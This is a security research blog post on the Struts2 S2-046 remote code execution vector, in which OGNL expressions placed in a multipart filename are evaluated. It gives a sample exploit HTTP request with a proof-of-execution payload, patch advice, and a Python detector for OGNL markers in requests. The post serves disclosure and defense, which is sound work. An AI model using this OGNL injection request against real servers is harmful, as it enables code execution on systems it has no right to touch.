Struts2-046: A new vector

alvaro_munoz

Last week a new Remote Code Execution (RCE) vulnerability affecting Struts2 (S2-045) was published. We already blogged about it, so we will not go into the details of how Struts2 was exploitable through the Content-Type header. Today's post focuses instead on how important it is to analyze and understand bugs when they are made public. In this case we wanted to verify that Fortify SCA detected the vulnerability when scanning the involved source code (Struts2 plus Apache Commons FileUpload), and we were surprised to find that, in addition to the known attack vector via the Content-Type header, SCA also reported a second dataflow, this one originating from the file name in the multipart request. The analysis evidence trace looks like this:

[Figure: Picture1.png, the Fortify SCA analysis evidence trace]

Reading through the code, it was clear that this was a true positive that can be triggered when all of the following requirements are met:

  • JakartaStreamMultipartRequest is used. The Struts2 application must be configured to use the Jakarta stream parser, which is not the default one. Check your Struts2 configuration files for the following constant:  <constant name="struts.multipart.parser" value="jakarta-stream" />
  • The size of the upload, as declared in the request's Content-Length header, is bigger than the Struts2 maximum allowed request size (struts.multipart.maxSize, which defaults to 2097152 bytes, roughly 2 MB). Only the declared value is compared against the limit, so the body sent does not need to be that large, as the sample request below shows.
  • The file name in the part's Content-Disposition header contains an OGNL payload.

If these requirements are met, vulnerable Struts2 versions build an exception message containing the attacker-controlled file name and then localize that message through the OGNL value stack, which interpolates any ${} or %{} expressions found in it, evaluating them as OGNL.

A malicious request could look like the following (this payload only adds a response header as a harmless proof of execution):

POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close

------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain

Kaboom
------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

The issue was reported to the Struts2 team, which published a new security bulletin (S2-046) detailing the affected versions, patches, and workarounds for the additional vectors. Note that the patches for the 2.3.x and 2.5.x branches released as the fix for S2-045 also protect against this vulnerability. If for any reason you cannot upgrade to a fixed version (2.3.32 or 2.5.10.1), the Struts2 team has developed a new plugin as a drop-in solution.

Please review any temporary workarounds you may have put in place (Servlet filters, WAF rules, and the like) and make sure they account for all the attack vectors: the Content-Type header of the request and the filename in the Content-Disposition header of each multipart part.
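As an added illustration of the three requirements listed above and of the workaround review just mentioned, the following script inspects a raw HTTP request for both vectors: OGNL markers in the Content-Type header (the S2-045 shape) and in a part's filename, plus the declared Content-Length exceeding struts.multipart.maxSize, which is what sends JakartaStreamMultipartRequest down the error path. This is example code written for this post, not code from the original article or from the Struts project; the function names are ours, the sample requests are constructed (the first one reproduces the request shown above), and the 2097152-byte limit assumes the application runs with the default maxSize.

```python
"""Inspect a raw HTTP request for the S2-045 / S2-046 multipart attack vectors.

Added example (not from the original post or the Struts project). It models
the conditions described above as a standalone check that could back a WAF
rule or a servlet-filter test. All names are ours; samples are constructed.
"""
import re

# struts.multipart.maxSize default; assumption: the app keeps the default
DEFAULT_MAX_SIZE = 2097152
# Both interpolation markers that the localization step expands as OGNL
OGNL_MARKER = re.compile(r"[%$]\{")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def iter_part_headers(body: bytes, boundary: str):
    """Yield the header dict of every part in a multipart/form-data body."""
    delimiter = b"--" + boundary.encode("latin-1")
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter: no more parts
            break
        head, _, _ = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        part = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, sep, value = line.partition(":")
            if sep:
                part[name.strip().lower()] = value.strip()
        yield part


def inspect_request(raw: bytes, max_size: int = DEFAULT_MAX_SIZE):
    """Return the findings for one raw request, in the order they are seen.

    ognl-in-content-type    OGNL markers in the Content-Type header (S2-045 vector)
    ognl-in-filename        OGNL markers in a part's filename (S2-046 vector)
    jakarta-stream-trigger  filename vector plus declared Content-Length above
                            max_size, i.e. the error path described above is reached
    """
    findings = []
    _, headers, body = parse_request(raw)
    content_type = headers.get("content-type", "")

    if OGNL_MARKER.search(content_type):
        findings.append("ognl-in-content-type")

    boundary = re.search(r'boundary="?([^";]+)"?', content_type)
    if not content_type.lower().startswith("multipart/form-data") or not boundary:
        return findings                    # not a multipart upload: nothing more to parse

    # Struts compares the declared Content-Length, not the bytes actually sent
    try:
        declared_length = int(headers.get("content-length", "0"))
    except ValueError:
        declared_length = 0
    oversized = declared_length > max_size

    for part in iter_part_headers(body, boundary.group(1)):
        filename = re.search(r'filename="([^"]*)"', part.get("content-disposition", ""))
        if filename and OGNL_MARKER.search(filename.group(1)):
            findings.append("ognl-in-filename")
            if oversized:
                findings.append("jakarta-stream-trigger")
    return findings


# Constructed sample: the request shown in the post, with CRLF line endings
S2_046_REQUEST = (
    b"POST /doUpload.action HTTP/1.1\r\nHost: localhost:8080\r\n"
    b"Content-Length: 10000000\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z\r\n"
    b"Connection: close\r\n\r\n"
    b"------WebKitFormBoundaryAnmUgTEhFhOZpr9z\r\n"
    b"Content-Disposition: form-data; name=\"upload\"; filename=\"%{#context"
    b"['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}\"\r\n"
    b"Content-Type: text/plain\r\n\r\nKaboom\r\n"
    b"------WebKitFormBoundaryAnmUgTEhFhOZpr9z--\r\n"
)

# Constructed sample: a benign upload of the same shape
BENIGN_REQUEST = (
    b"POST /doUpload.action HTTP/1.1\r\nHost: localhost:8080\r\nContent-Length: 180\r\n"
    b"Content-Type: multipart/form-data; boundary=abc123\r\n\r\n"
    b"--abc123\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"report.txt\"\r\n"
    b"Content-Type: text/plain\r\n\r\nhello\r\n--abc123--\r\n"
)

# Constructed sample: OGNL markers in Content-Type (S2-045 shape); not a working payload
S2_045_SHAPE = (
    b"POST /doUpload.action HTTP/1.1\r\nHost: localhost:8080\r\nContent-Length: 0\r\n"
    b"Content-Type: %{(#demo='multipart/form-data')}\r\n\r\n"
)

if __name__ == "__main__":
    for label, request in (("s2-046", S2_046_REQUEST), ("benign", BENIGN_REQUEST),
                           ("s2-045", S2_045_SHAPE)):
        print(label, inspect_request(request))
```

Running the script against the post's request reports both the OGNL file name and the oversized declared length; raising max_size above the declared 10000000 bytes leaves only the filename finding, which is the case a Struts deployment with a larger maxSize would see. The filename regex models the common double-quoted form only; a rule in production should run after the same parameter parsing the server uses, since encoded or RFC 5987 filename variants would slip past a plain text match.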

Stay secure!
